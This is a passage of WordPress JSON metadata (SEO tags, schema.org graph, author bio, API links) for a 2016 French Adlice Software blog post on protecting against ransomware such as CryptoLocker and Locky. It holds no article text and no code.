Software\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/RogueKiller\",\"https:\/\/x.com\/AdliceSoftware\",\"https:\/\/fr.linkedin.com\/company\/adlice-software\",\"https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\",\"name\":\"tigzy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g\",\"caption\":\"tigzy\"},\"description\":\"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.\",\"url\":\"https:\/\/www.adlice.com\/fr\/author\/tigzy\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software","description":"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","og_locale":"fr_FR","og_type":"article","og_title":"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software","og_description":"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.","og_url":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","og_site_name":"Adlice Software","article_publisher":"https:\/\/www.facebook.com\/RogueKiller","article_published_time":"2016-06-13T07:34:28+00:00","article_modified_time":"2022-12-21T10:36:56+00:00","og_image":[{"width":754,"height":444,"url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","type":"image\/png"}],"author":"tigzy","twitter_card":"summary_large_image","twitter_creator":"@AdliceSoftware","twitter_site":"@AdliceSoftware","twitter_misc":{"\u00c9crit par":"tigzy","Dur\u00e9e de lecture estim\u00e9e":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#article","isPartOf":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/"},"author":{"name":"tigzy","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d"},"headline":"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement ?","datePublished":"2016-06-13T07:34:28+00:00","dateModified":"2022-12-21T10:36:56+00:00","mainEntityOfPage":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/"},"wordCount":1343,"publisher":{"@id":"https:\/\/www.adlice.com\/fr\/#organization"},"image":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","keywords":["analyse","cryptolocker","cryptolocker","locky","locky","malware","malware","ran\u00e7on","ran\u00e7ongiciel"],"articleSection":["Analyse"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","url":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","name":"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software","isPartOf":{"@id":"https:\/\/www.adlice.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage"},"image":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage"},"thumbnailUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","datePublished":"2016-06-13T07:34:28+00:00","dateModified":"2022-12-21T10:36:56+00:00","description":"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.","breadcrumb":{"@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","width":754,"height":444},{"@type":"BreadcrumbList","@id":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.adlice.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement ?"}]},{"@type":"WebSite","@id":"https:\/\/www.adlice.com\/fr\/#website","url":"https:\/\/www.adlice.com\/fr\/","name":"Adlice Software","description":"Anti-malware and analysis tools","publisher":{"@id":"https:\/\/www.adlice.com\/fr\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.adlice.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/www.adlice.com\/fr\/#organization","name":"Adlice Software","url":"https:\/\/www.adlice.com\/fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/","url":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","contentUrl":"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png","width":276,"height":276,"caption":"Adlice Software"},"image":{"@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/RogueKiller","https:\/\/x.com\/AdliceSoftware","https:\/\/fr.linkedin.com\/company\/adlice-software","https:\/\/www.youtube.com\/channel\/UC4CQ-gIZMGWxl-auf0QqYhQ"]},{"@type":"Person","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d","name":"tigzy","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d81e380961b1b69969fa84994ad1e4cba26afe93a49d8dd3148e9c33ffe4ccac?s=96&d=mm&r=g","caption":"tigzy"},"description":"Founder and owner of Adlice Software, Tigzy started as lead developer on the popular Anti-malware called RogueKiller. Involved in all the Adlice projects as lead developer, Tigzy is also doing research and reverse engineering as well as writing blog posts.","url":"https:\/\/www.adlice.com\/fr\/author\/tigzy\/"}]}},"_links":{"self":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/posts\/428","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/comments?post=428"}],"version-history":[{"count":0,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/posts\/428\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/media\/425"}],"wp:attachment":[{"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/media?parent=428"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/categories?post=428"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.adlice.com\/fr\/wp-json\/wp\/v2\/tags?post=428"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}